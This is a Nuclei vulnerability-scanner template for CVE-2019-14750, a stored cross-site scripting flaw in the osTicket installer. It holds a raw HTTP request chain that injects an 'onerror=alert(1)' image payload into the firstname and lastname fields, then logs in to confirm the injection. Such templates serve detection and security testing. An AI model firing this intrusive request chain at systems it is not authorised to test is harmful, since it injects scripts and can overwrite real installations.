89 lines
3.3 KiB
YAML
89 lines
3.3 KiB
YAML
id: CVE-2019-14750
|
|
|
|
info:
|
|
name: osTicket < 1.12.1 - Cross-Site Scripting
|
|
author: TenBird
|
|
severity: medium
|
|
description: |
|
|
An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions.
|
|
remediation: |
|
|
Upgrade osTicket to version 1.12.1 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-14750
|
|
- http://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html
|
|
- https://github.com/osTicket/osTicket/commit/c3ba5b78261e07a883ad8fac28c214486c854e12
|
|
- https://github.com/osTicket/osTicket/releases/tag/v1.10.7
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2019-14750
|
|
cwe-id: CWE-79
|
|
epss-score: 0.05309
|
|
epss-percentile: 0.92247
|
|
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 4
|
|
vendor: osticket
|
|
product: osticket
|
|
shodan-query: title:"osTicket"
|
|
tags: packetstorm,cve,cve2019,osticket,xss,intrusive
|
|
variables:
|
|
user_name: "{{to_lower(rand_text_alphanumeric(6))}}"
|
|
user_pass: "{{rand_text_alphanumeric(12)}}"
|
|
user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /upload/setup/install.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
s=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo
|
|
- |
|
|
GET /upload/scp/login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
- |
|
|
POST /upload/scp/login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1
|
|
- |
|
|
GET /upload/scp/settings.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
redirects: true
|
|
cookie-reuse: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_4
|
|
words:
|
|
- '<img src=x onerror=alert(1);>'
|
|
- 'getConfig().resolve'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header_4
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: csrftoken
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- '__CSRFToken__" value="(.*?)"'
|
|
internal: true
|
|
|
|
# digest: 4a0a00473045022063440bcba7ab8b00b5bbd323239867a78acd1bf3ffbf1e4cca4822b043daa0340221008eaf2bf098c33881b2eb35039833946eb2ccb658b7c2f43dd325d01b290bca6c:922c64590222798bb761d5b6d8e72950
|